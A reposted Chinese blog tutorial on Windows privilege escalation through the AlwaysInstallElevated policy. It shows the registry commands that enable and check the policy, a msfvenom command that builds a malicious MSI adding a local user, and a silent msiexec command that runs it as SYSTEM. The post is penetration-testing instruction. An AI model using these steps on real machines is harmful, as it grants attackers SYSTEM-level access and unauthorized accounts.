ICode9

精准搜索请尝试: 精确搜索
首页 > 系统相关> 文章详细

Windows提权 —— MSI文件提权

2022-08-03 11:35:55  阅读:160  来源: 互联网

标签:Windows AlwaysInstallElevated 提权 MSI Installer reg


MSI文件提权

MSI文件提权,即任意用户以SYSTEM权限安装MSI文件造成提权。AlwaysInstallElevated是注册表的一个键值,当其值为1时候,在系统中使用Windows Installer安装任何程序,允许非特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以system权限执行任意payload。

MSF集成了漏洞利用模块:exploit/windows/local/always_install_elevated 。详细利用步骤如下:

1. 环境准备

  • 激活AlwaysInstallElevated

方法一:本地组策略(gpedit.msc):计算机配置–管理模板–Windows组件–Windows Installer,点击启用“始终以提升的权限进行安装”;用户配置–管理模板–Windows组件–Windows Installer,点击启用“始终以提升的权限进行安装”。

方法二:cmd修改注册表(rgedit)

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
https://www.icode9.com/i/l/?n=22&i=blog/2913122/202208/2913122-20220803112003437-1532534164.png

2. 利用步骤

  1. 判断是否启用了AlwaysInstallElevated策略。当两个注册表键值查询结果均为1时,代表该策略已启用。
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
https://www.icode9.com/i/l/?n=22&i=blog/2913122/202208/2913122-20220803112003948-268235135.png
  1. 使用msfvenom生成恶意程序上传
msfvenom -p windows/adduser USER=test000 PASSWORD=password123! -f msi -o rotten.msi
https://www.icode9.com/i/l/?n=22&i=blog/2913122/202208/2913122-20220803112004304-1208065056.png
  1. msiexec运行MSI文件即可实现提取。
msiexec /quiet /qn /i rotten.msi
https://www.icode9.com/i/l/?n=22&i=blog/2913122/202208/2913122-20220803112004671-594946494.png

标签:Windows,AlwaysInstallElevated,提权,MSI,Installer,reg
来源: https://www.cnblogs.com/Y1ngZha0/p/16546438.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有